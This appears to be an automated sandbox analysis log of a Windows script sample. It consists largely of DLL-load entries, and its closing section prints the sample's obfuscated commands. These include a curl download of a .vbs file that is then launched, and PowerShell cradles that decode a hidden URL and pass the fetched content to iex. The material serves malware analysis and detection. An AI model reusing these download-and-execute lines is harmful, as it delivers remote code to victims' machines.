Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbe0899 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ystem.Core.pdb` source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2433683508.0000024EBBFA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B3DD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2352549438.000001CA6B5E2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdban source: powershell.exe, 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: *e.pdb source: powershell.exe, 00000011.00000002.2352549438.000001CA6B584000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: powershell.exe, 00000011.00000002.2352549438.000001CA6B584000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.Core.pdbgRc2 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb; source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbatYs source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2435362967.0000024EBC210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2352549438.000001CA6B5D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb[dhc source: powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbL source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbEvX1 source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("cmd /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-downlo", "2", "true");IWshShell3.ExpandEnvironmentStrings("%PUBLIC%");IWshShell3.Run("cmd /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-downlo", "2", "true");IWshShell3.Run("cmd /V/D/c start C:\Users\Public\67618a47ee8cd.vbs", "2", "true");IWshShell3.ExpandEnvironmentStrings("%PUBLIC%");IWshShell3.Run("cmd /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-downlo", "2", "true");IWshShell3.Run("cmd /V/D/c start C:\Users\Public\67618a47ee8cd.vbs", "2", "true");IWshShell3.Run("cmd /V/D/c start C:\Users\Public\67618a47ee8cd.vbs", "2", "true")
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
            Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
            Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
